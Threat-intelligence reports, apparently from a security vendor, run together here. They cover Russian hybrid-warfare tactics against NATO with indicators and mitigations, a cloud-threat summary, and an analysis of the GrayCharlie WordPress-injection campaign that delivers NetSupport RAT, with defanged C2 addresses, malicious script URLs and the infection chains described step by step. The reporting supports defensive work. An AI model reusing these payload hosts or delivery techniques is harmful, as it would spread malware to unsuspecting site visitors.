Across Europe, Russia will almost certainly continue to attempt to delegitimize existing democratic institutions and Europe’s information ecosystem by continuing to foster distrust in elections, mainstream media, the EU, and pro-European government figures. In a post-war environment, assuming European sanctions on Russian media enterprises are lifted, Russia will very likely attempt to reestablish its state media presence while also hardening itself to withstand future disruptions, legal restrictions, and platform or government takedowns in the event of a kinetic conflict with Europe.

New Generation Warfare operations against Europe will very likely incorporate much of Russia’s current-era influence tradecraft, including social media influence via human and automated networks, media impersonation and covert media outlet brands, illicit financing and bribery, and cyber-enabled influence such as hack-and-leak narratives. Further, Insikt Group assesses Moscow will very likely continue attempting to cultivate sympathetic allies through covertly funded fringe socio-political organizations, using these entities to astroturf “grassroots” support, amplify Kremlin-aligned narratives, and catalyze or intensify domestic unrest across Europe. We assess that Russia will also adapt emerging technologies, particularly AI, to scale the production, localization, and quality of influence content, increase dissemination efficiency, and optimize targeting. Continued advances in generative AI will almost certainly improve the realism of propaganda images and fabricated reporting, forged documents and correspondence, and synthetic impersonations of public figures, including audio and video deepfakes.

Airspace Incursions by Drones and Jets

Beginning in September 2025, suspected violations of NATO airspace by Russia-directed drone operators or Russian jets increased to unprecedented levels, as Russia likely sought to project power across NATO territory and test NATO resolve while maintaining plausible deniability. Insikt Group tracked 30 suspected or confirmed violations between September 2025 and January 2026, compared to 23 suspected or confirmed violations between March 2022 and August 2025. The most commonly targeted countries since March 2022 have been Poland and Romania; however, suspected Russian violations of NATO airspace have occurred outside of Russia’s historic sphere of influence, including in Germany, UK, Denmark and Norway. Violations have most frequently targeted critical infrastructure, such as military bases and airports.

In a full-scale New Generation Warfare-like campaign in Europe, Russia likely would escalate the frequency and level of aggressiveness of these violations. Russia’s targeting would likely continue to focus on critical infrastructure, but violations would very likely significantly increase in frequency. Russia would also likely use drones to fly closer to targets and perhaps hover over them for extended periods of time, in a likely effort to test NATO’s willingness to shoot down drones and perhaps collect intelligence on critical infrastructure facilities. Indeed, in September 2025, Polish authorities said they shot down Russian drones that violated Poland’s airspace.

Other ways Russia would likely escalate the aggressiveness of its airspace violations include timing those violations with major NATO events, such as military exercises and summits. Russia could escalate its use of drones as electronic warfare mechanisms, perhaps to disrupt NATO military exercises or the functioning of critical infrastructure facilities.

Russia would likely also use its drones to amplify its psychological warfare as a way of projecting power and demonstrating to the public that Moscow can disrupt everyday life in NATO countries. Russia could do this via tactics such as hovering drones over civilian transportation infrastructure, like railways or airports, which have already been forced to temporarily close. Russia could also launch drones over facilities hosting political summits, such as the annual NATO Summit, or over polling places during elections to stoke public fear. In a full-scale NGW campaign that involves coordination of multiple tactics, Russian propaganda outlets might release footage of these incidents to propagate a narrative that NATO states cannot protect their infrastructure. Russia could also combine drone or jet violations with sabotage operations to further sow public panic and force NATO governments into a defensive posture.

Russia would very likely seek to maintain some level of deniability and would avoid airstrikes and mass casualty events, which would almost certainly guarantee an Article 5 declaration.

Territorial Waters Violations and Targeting of Undersea Cables

Insikt Group assesses that, since February 2022, Russia has increasingly used violations of NATO states’ territorial waters⁴ and targeting of undersea cables to test the alliance’s resilience, collect intelligence, keep NATO in a reactive, defensive posture, and attempt to deter NATO from undermining Russian strategic interests. In June 2023, Deputy Chairman of the Security Council Dmitriy Medvedev stated that, “if we proceed from the proven complicity of Western countries in blowing up the Nord Streams, then we have no constraints — even moral — left to prevent us from destroying the ocean-floor cable communications of our enemies.” Medvedev’s comments were likely purposefully hyperbolic; however, they likely reflect a Kremlin perception that NATO is targeting Russian strategic interests, thereby justifying retaliatory action.

Examples of Russia likely targeting undersea cables and maritime assets include an April 2025 incident in which the UK identified Russian sensors attempting to collect intelligence on UK nuclear submarines and other underwater critical infrastructure; the Russian Yantar surveillance ship sailing near cables carrying data for Google and Microsoft under the Irish Sea in November 2024; and reports suggesting that the Russian Eagle S ship accused of damaging multiple undersea cables in December 2024 carried spy equipment to monitor naval activity.

Russian ships have also violated NATO states’ territorial waters, likely to test NATO resilience, force NATO into a defensive posture, and project power. Examples include a July 2025 incident in which a Russian border guard vessel entered Estonian territorial waters without permission; a July 2024 incident in which a Russian naval vessel entered Finnish territorial waters without authorization; and frequent encounters between NATO states and Russia-linked “shadow fleet” vessels. These vessels are tankers sailing under other flags, which often refuse inspection or orders from local navies.

During a full-scale New Generation Warfare campaign against NATO, Russia likely would escalate its targeting of undersea cables and violations of territorial waters. This could include more frequent cable targeting, likely to cause minor but persistent damage to undersea critical infrastructure that tests NATO resilience and Russian destructive capabilities without provoking an Article 5 declaration. Russia could also conduct electronic jamming operations during cable repairs to inhibit communications and use Russian ships to harass those conducting repairs.

Russia would also likely attempt longer and more provocative territorial waters violations, including placing Russian ships near NATO vessels and expanding these activities into areas such as the Mediterranean; conducting concurrent hybrid activity such as GPS jamming and automatic identification system (AIS) spoofing; refusing escort out of territorial waters; and combining territorial waters violations with airspace violations by Russian aircraft or targeting of undersea infrastructure.

Russia would likely aim to overwhelm NATO’s existing efforts to prevent sabotage of undersea infrastructure. In January 2025, Allied Joint Force Command Brunssum (JFCBS) launched Baltic Sentry — a campaign that uses tools such as frigates, maritime patrol assets, and naval drones to deter sabotage of undersea infrastructure. Since the launch of Baltic Sentry, the Baltic Sea has experienced very few undersea sabotage efforts; however, it is not clear whether this is the result of Baltic Sentry or a lack of planned operations.

Sabotage Operations

We assess Russia has escalated its use of sabotage operations in NATO territory since its full-scale invasion of Ukraine in 2022, likely to test the resilience particularly of NATO states’ critical infrastructure; propagate a narrative that Western states cannot protect their populations from threats; harm NATO’s ability to collectively respond to Russian aggression by forcing NATO into a reactive, defensive posture; and degrade NATO states’ ability to provide material support to Ukraine. Sabotage operations are loosely defined, but typically consist of targeting civilian or dual-use infrastructure with physical security attacks by deniable entities.

Particularly since 2022, Russia-linked entities have focused sabotage operations on critical infrastructure in NATO states, exploiting vulnerabilities wrought from deferred maintenance and lack of sufficient public or private investment in upkeep. Within critical infrastructure, the most frequently targeted sectors include undersea telecommunication and power cables; water supply and distribution; transportation; military; healthcare; and telecommunications. The number of Russian sabotage operations has quadrupled from 2023 to 2024, and in 2025, it was likely at levels consistent with 2024. Operations have occurred across NATO, as opposed to being focused in Russia’s historic sphere of influence. That said, the most commonly targeted states between January 2018 and June 2025 were Germany, Estonia, Latvia, Lithuania, and Poland.

In a New Generation Warfare-like campaign targeting NATO territory, Moscow would likely move from what we assess has thus far been largely opportunistic sabotage to operations with more consistency and geographic breadth, and that complement other tactics.

Russia would likely still focus its sabotage operations on critical infrastructure, but would likely place a premium on damaging the critical infrastructure of NATO states that either would be probable targets of a Russian military incursion — such as Poland or the Baltic states — or would lend significant assistance to those states, such as the UK, Germany, or France. This is because in an NGW campaign, Russia would likely view sabotage operations as, in part, a way to test the resilience of potential victim states and their allies. Russia’s sabotage operations against those targets would likely be more frequent and could coincide with significant events such as elections or military exercises. Russia would likely pair sabotage operations with other tactics, such as offensive cyber operations or airspace violations, to augment the destructive impact of the operations and try to strain NATO states’ capacity by forcing them to respond to multiple disruptions at once, while still staying below the threshold that would risk an Article 5 declaration.

Offensive Cyber Operations for Disruption and Counterintelligence

Russian cyber activity directed at European targets has consistently emphasized access-oriented operations, including attacks on internet-facing firewalls, virtual private networks (VPNs), email services, and web portals. This activity aligns with documented Russian cyber practices focused on enabling intelligence collection, operational reach, and long-term flexibility rather than immediate disruptive effects. Recent Insikt Group reporting highlights BlueEcho activity targeting perimeter infrastructure to establish footholds and enable follow-on credential capture and lateral movement, while BlueDelta campaigns demonstrate sustained credential harvesting at scale using impersonated Microsoft Outlook Web App (OWA), Sophos VPN, and Google login workflows. This tradecraft is low-cost, repeatable, and consistent with long-term counterintelligence targeting of government, defense, and research entities.

Russian cyber activity affecting Europe has been broad in scope, with targeting observed across multiple regions and sectors. If cyber operations were used for more overtly disruptive purposes, effects would likely be more pronounced in states with weaker cybersecurity maturity or slower coordinated response mechanisms, such as fragmented local-government IT environments or limited national incident response surge capacity. This does not preclude activity against major NATO states, where Russian cyber operations have historically focused more heavily on intelligence collection and access. BlueDelta’s targeting of NATO-aligned and defense-related organizations reflects continued Russian interest in strategically valuable European targets aligned with GRU intelligence requirements.

Observed Russian cyber activity also provides insight into how operations could escalate if strategic conditions were to change and Russia were to launch a full-scale NGW campaign. Russian threat actors have demonstrated the ability to establish and maintain access over time, including through persistent connections and tunneling, which could be repurposed to degrade remote access services, manipulate edge-device configurations, or cause temporary service disruption. In Ukraine, cyber activity has been observed alongside influence operations and physical sabotage, including Recorded Future–tracked influence campaigns such as CopyCop, which leveraged automated content replication and spoofed media infrastructure to amplify pro-Russian narratives in parallel with other forms of hybrid activity. If applied elsewhere, similar coordination could increase pressure on incident response capabilities and undermine public confidence in the reliability of essential services. Credential-harvesting operations further provide pathways beyond inbox access, including potential compromise of identity providers, VPN portals, and privileged administrative portals.

Russian cyber operations have historically involved establishing and maintaining access to targeted networks over extended periods, a pattern also documented in prior campaigns in Ukraine. However, there is no public evidence demonstrating that the access currently observed in European networks is intended for future disruptive operations. If a kinetic conflict were to escalate in Europe, Russia would likely seek to expand or prioritize access within relevant networks to support intelligence collection, operational coordination, or potential disruption. Russia also has a documented history of tolerating or leveraging cybercriminal activity alongside state-directed operations, including overlap with criminal infrastructure and access brokers, which may allow operators to expand scale, complicate attribution, and generate disruptive effects without overtly exposing state-linked capabilities. Collectively, activity associated with BlueAlpha, BlueDelta, BlueEcho, Sandworm, and Dragonfly illustrates Russia’s ability to scale cyber operations from access and intelligence collection toward disruption if strategic conditions were to change, consistent with broader hybrid and New Generation Warfare practices.

Exploitation of European Dependence on Russian Oil and Natural Gas

Russia has long exploited other states’ dependence on its natural gas and oil to exercise leverage over them, typically by strategically decreasing supply flows, particularly during high-demand periods, such as winter. For example, in 2006, Georgia accused Russia of intentionally cutting gas supplies during an unusually cold period to increase political pressure on Tbilisi. In the run-up to Russia’s full-scale invasion of Ukraine in February 2022, Russian state gas company Gazprom reduced natural gas deliveries to Europe, likely in an effort to pressure Europe into abandoning a unified stance on supporting Ukraine.

Since 2022, many NATO states have sought to reduce their dependence on Russian natural gas and oil; however, several states remain dependent, including Slovakia, Hungary, and Türkiye. In a full-scale New Generation Warfare campaign in Europe, Russia would very likely escalate its exploitation of those states’ dependence on Russian energy imports to demonstrate Moscow’s ability to degrade European critical infrastructure, undermine NATO unity, gauge the resilience of these states’ critical infrastructure, and test Russia’s ability to handicap critical infrastructure, should Putin decide to launch a military incursion into NATO territory.

Moscow’s willingness to exploit these states’ dependence on Russian energy likely varies by state. Moscow is less likely to exploit Hungary’s dependence on Russian oil and gas, given Budapest’s strong relations with Russia. Slovakia is a more likely target, as it seeks a positive relationship with Moscow, but is likely of less strategic importance to Russia than Hungary. Moscow’s relations with Türkiye have fluctuated between positive and adversarial; the likelihood of exploiting Türkiye’s dependence on Russian energy imports would likely depend, in part, on how positive the overall Russia-Türkiye relationship is at that time.

Escalation of economic critical infrastructure targeting would likely take the form of both more frequent and more geographically broad operations, particularly during high-demand periods such as the winter and perhaps during NATO military exercises or elections. Russia could also escalate its use of pricing manipulation to punish states that work against Russia’s strategic priorities in Ukraine, and reward pro-Russia states such as Hungary.

Russia would also likely combine supply cuts with sabotage operations. For example, in 2006, Moscow cut gas supplies in Georgia at the same time it sabotaged an electricity line. Following a successful operation, pro-Russia propaganda outlets would likely amplify narratives that claim European critical infrastructure is weak and vulnerable, and that this demonstrates the inadequacy of democracy and the Western political system writ large at fulfilling basic public needs.

In a New Generation Warfare campaign against Europe, Russia would be unlikely to seek permanent damage to European critical infrastructure or mass civilian harm from disruption of energy flows. Russia would also likely avoid long-term disruption of oil and gas deliveries to limit the financial impact, since oil and gas revenues comprise roughly 25% of Russia’s annual federal revenue.

Indicators of NGW Campaign in Europe, Implications for Public and Private Sectors, and Recommended Mitigations

Tactic: Influence Operations

Indicators of NGW Campaign

• Increased convergence of narratives across propaganda outlets, including state media, inauthentic social media accounts, and so on
• Parallel narratives tailored to each country or region

Implications for Public and Private Sectors

• Public Sector: more pronounced political polarization; reduced public trust in government competence
• Private Sector: brand damage if firms are targeted in influence operation (IO) campaigns; employee or executive harassment or doxxing

Recommended Mitigations

• Ensure communication response protocols are in place, such as rapid rebuttal measures
• Ensure information environment monitoring is attuned to Russia-nexus narratives so inauthentic behavior can be detected quickly

Tactic: Airspace Incursions by Drones and Jets

Indicators of an NGW Campaign

• More frequent incursions that last longer and target strategic sites such as military training grounds, critical infrastructure nodes, and so on
• Incursions are conducted at lower altitudes, with transponders turned off
• Violations are clustered around NATO decisions or major military exercises

Implications for Public and Private Sectors

• Public: forced closures of critical infrastructure sites during airspace violations, thereby disrupting operations, as well as likely escalation of public alarm and potential decrease in public confidence in the government’s ability to keep critical infrastructure safe
• Private: business operation disruptions due to critical infrastructure closures

Recommended Mitigations

• Strengthen counter-measures against unmanned aircraft systems (UASs) around critical sites
• Ensure joint civil-military air incident protocols are in place, including aviation alerts and Notice to Airmen (NOTAM) coordination
• Improve GPS resilience

Tactic: Territorial Waters Violations and Targeting of Undersea Cables

Indicators of an NGW Campaign

• More frequent territorial waters violations
• Violations by state-linked vessels
• Non-compliance with escort or hails; risky maneuvering around NATO state vessels, perhaps to provoke potential collisions
• Increased loitering of suspicious vessels near cable routes and landing areas
• Repeated “anchor drag” incidents
• Interference with repair ships
• Simultaneous cyber activity against telecommunications and energy operators

Implications for Public and Private Sectors

• Public: intermittent communications degradation; potential harm to energy infrastructure
• Private: major potential operational losses for telecommunications, finance, and other key sectors; potential increases in insurance costs for shipping companies, should territorial waters violations at ports become common

Recommended Mitigations

• Consider mapping alternative sea routes in case primary routes are disrupted; consider rapid reroute contracts
• Ensure sufficient port and state coordination
• Ensure physical hardening at cable landing sites
• Expand Baltic Sentry efforts to other locations

Tactic: Sabotage Operations

Indicators of an NGW Campaign

• More frequent operations, including arson, vandalism, explosions, and rail disruptions
• Targeting of high-priority sites, such as military logistics hubs, defense suppliers, and so on
• Targeting of civilian sites, such as shopping malls or residential neighborhoods
• Concurrent operations in multiple geographic regions, suggesting intentional planning
• Combined sabotage operations and airspace or territorial waters violations

Implications for Public and Private Sectors

• Public: potential reduction in public confidence in government’s ability to protect critical infrastructure and residential areas; in the event of significant escalation in sabotage operations, emergency services could be strained
• Private: facility damage or loss; threat to worker safety; supply chain interruption; business interruption; reputational liability

Recommended Mitigations

• Expand insider threat and contractor vetting at critical infrastructure sites
• Ensure physical security measures are in place, including perimeter detection, anti-drone measures, camera coverage, and access control
• Enhance public-private partnerships, as most of the critical infrastructure NATO relies upon is commercially owned
• Ensure rapid liaison channels with law enforcement and intelligence services

Tactic: Offensive Cyber Operations

Indicators of an NGW Campaign

• Campaigns that target strategic pressure points, such as logistics and transportation hubs, defense supply chains, and local government entities
• Intrusion and distributed denial-of-service (DDoS) activity spikes at politically significant moments, including elections, military exercises, or geopolitical summits
• Campaigns that blend state and proxy activity, such as hacktivist DDoS campaigns that amplify Kremlin-aligned narratives
• Coupling of multiple tactics, such as cyber and influence operation hybrid campaigns

Implications for Public and Private Sectors

• Public: DDoS and ransomware campaigns can undermine public confidence in the reliability of institutions; compromise of government narratives can result in less public confidence in the truth of government messaging; even attempted election manipulation can reduce confidence in voting systems
• Private: elevated risk of disruption of key logistics, transport, rail, and aviation systems; hack and leak operations pose risk to reputation, personally identifiable information, and intellectual property rights; targeting of critical infrastructure can result in operational disruption

Recommended Mitigations

• Enforce phishing-resistant multi-factor authentication
• Implement conditional network access based on geopolitical and risk factors
• Patch for commonly exploited software
• Reduce exposure (lock down admin portals; restrict by IP address; remove unused services)
• Use DDoS protection, autoscaling
• Coordinate with the national computer emergency response team (CERT) and National Counterintelligence and Security Center (NCSC), as well as upstream providers; rehearse continuity plans
• Require multi-factor authentication (MFA) and logging parity from third-party providers; segment privileged access; monitor for abnormal remote management activity

Tactic: Leveraging Economic Dependence

Indicators of an NGW Campaign

• Supply manipulation, including threats or actions to raise price volatility
• Exploitation of legal measures, including sudden contract disputes or claims of force majeure
• More frequent cessation of oil and gas supplies, especially during high-demand periods such as winter

Implications for Public and Private Sectors

• Public: higher energy bills and supply disruption, potentially leading to public dissatisfaction
• Private: price shocks, supply uncertainty, costs related to resolving alleged contract disputes

Recommended Mitigations

• Diversify suppliers and routes
• Ensure on-site backup generation where feasible

Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:

• Exploitation and Misconfiguration
• Cloud Abuse
• Cloud Ransomware
• Credential Abuse, Account Takeover, and Unauthorized Access
• Third-Party Compromise

Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateways, and enterprise resource planning (ERP) platforms — as well as stolen or weakly governed credentials sourced from public leaks, compromised developer workstations, and socially engineered helpdesk workflows. Once inside a targeted environment, threat actors systematically pivot through hybrid identity and virtual private network (VPN) infrastructure, targeting directory-synchronized accounts, non-human and executive identities, and privileged cloud roles to gain tenant-wide administrative control.

Post-compromise activity is characterized by heavy use of built-in cloud and SaaS functionality: enumerating and exfiltrating data via native storage and backup services, destroying or encrypting cloud backups and snapshots for impact, manipulating static frontends and continuous integration/continuous deployment (CI/CD) pipelines to subvert trust in applications and repositories, and using mainstream platforms such as calendar services as covert command-and-control (C2) channels.

In comparison to its previous iteration, the majority of the events discussed in this report indicate that threat actors are engaging in similar threat behaviors; however, there are three specific trends that appear to have emerged since the most recent iteration:

• Cloud threat actors are registering their own legitimate cloud resources for use in attack chains.
• DDOS attacks are becoming less effective when targeting cloud environments, even in instances of record-breaking throughput, due to increased cloud-native capabilities for mitigating these threats.
• Cloud threat actors are increasingly diversifying the types of services that they target in victim environments during an attack chain, with a notable focus on LLM and other AI-powered services hosted in cloud environments.

The trends associated with abuse indicate a shift in threat actor perception, demonstrating that threat actors are exploring the broader benefits that compromised cloud services can provide.

Download Cloud Threat Landscape: Executive Insights

Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.

To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section of this report for implementation guidance and Appendix A for a complete list of indicators of compromise (IoCs).

Key Findings

• GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.
• Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.
• Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.

Background

GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.

In late March or early April 2025, SmartApeSG shifted from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.

GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.

Threat Analysis

Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.

Infrastructure Analysis

NetSupport RAT Clusters

Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see Figure 1). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.

Figure 1: Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)

Cluster 1

Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key DCVTTTUUEEW23 and serial number NSM896597, before shifting to the license key EVALUSION and serial number NSM165348 in subsequent deployments. The C2 servers associated with this cluster are listed in Table 1.

Table 1: NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)

Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name june5ebatquot associated with IP address 94[.]158[.]245[.]135 was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name june6 linked to 94[.]158[.]245[.]174 was created only 20 seconds later.

Cluster 2

Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificates typically start with two or more repetitions of “s”, followed by an “i” and a number (so “sssi3”, for example). NetSupport RAT samples linked to Cluster 2 used the license key XMLCTL and serial number NSM303008. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in Table 2. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.

Table 2: NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)

Of note, one NetSupport RAT C2 server (94[.]158[.]245[.]56) used a TLS certificate with the common name 23sss, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (EVALUSION) and serial number (NSM165348) previously observed in Cluster 1.

Other NetSupport RAT C2 Servers

Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see Table 3). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.

Table 3: Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)

Staging Infrastructure

Once GrayCharlie victims land on the compromised WordPress sites, thereby satisfying the conditional logic, the payload is typically fetched from the attacker-controlled infrastructure and injected into the compromised WordPress sites. Insikt Group has identified two distinct types of staging infrastructure, each characterized by different website templates. Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”

Type 1: “Wiser University”

The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see Figure 2), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education website template for school, college, and university websites. (As a sidenote, Oreshnik is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) Appendix B lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).

Figure 2: Website impersonating “Wiser University” (Source: Recorded Future)

Suspected Testing Infrastructure

Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in Appendix B, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see Table 4). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.

Table 4: Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)

Type 2: “Activitar”

Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host specific websites (see Figure 3). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.

Figure 3: Website impersonating “Activitar” (Source: Recorded Future)

A subset of domains and IP addresses associated with Type 2 is presented in Table 5. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in Table 5, filmlerzltyazilimsx[.]shop, is linked to the email address oreshnik[@]mailum[.]com through its WHOIS record.

Table 5: Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)

Compromised Infrastructure

GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as hxxps://joiner[.]best/work/original[.]js), while others call a PHP file on specific endpoints using an ID parameter (such as hxxps://signaturepl[.]com/work/index[.]php?abje2LAw). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. Appendix A lists a subset of WordPress websites infected by GrayCharlie.

Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter remains the most frequent cause of all WordPress compromises.

Suspected Compromise of “Law Firm Acceleration Company” SMB Team

While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at hxxps://persistancejs[.]store/work/original[.]js (see Table 6).

Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in Table 6 (see Figure 4). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain persistancejs[.]store first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.

Table 6: Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)

Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.

In some instances, the same compromised WordPress sites are compromised by multiple threat actors simultaneously. For example, bianchilawgroup[.]com was also breached by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which used the domain vimsltd[.]com.

Higher-Tier Analysis

GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.

Attack-Chain Analysis

GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from %AppData%, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.

Attack Chain 1: Fake Browser Update Leading to NetSupport RAT

According to public reporting, when GrayCharlie first became active in mid-2023, it relied on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group observed a return to fake browser updates as early as October 12, 2025. Figure 5 provides an overview of Attack Chain 1.

Figure 5: Attack Chain 1 (Source: Recorded Future)

1. Website compromise and lure delivery. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy .dat files.
2. User-executed JavaScript loader. The victim manually runs the .js script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.
3. PowerShell staging via WScript. The JavaScript launches wscript.exe, which spawns powershell.exe. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.
4. Secondary payload retrieval. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including client32.exe and required DLLs.
5. File deployment and execution. The archive is extracted under the user profile (for example, %AppData%\Roaming\...). client32.exe is started in the background to minimize visible indicators to the user.
6. Persistence establishment. A Windows Run registry key is created to automatically launch client32.exe at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.
7. C2 readiness. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.

Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT

As early as April 2025, GrayCharlie began using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. Figure 6 provides an overview of Attack Chain 2.

Figure 6: Attack Chain 2 (Source: Recorded Future)

1. Initial delivery and redirection. Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.
2. Background script and profiling. A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.
3. ClickFix fake CAPTCHA. The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see Figure 7).

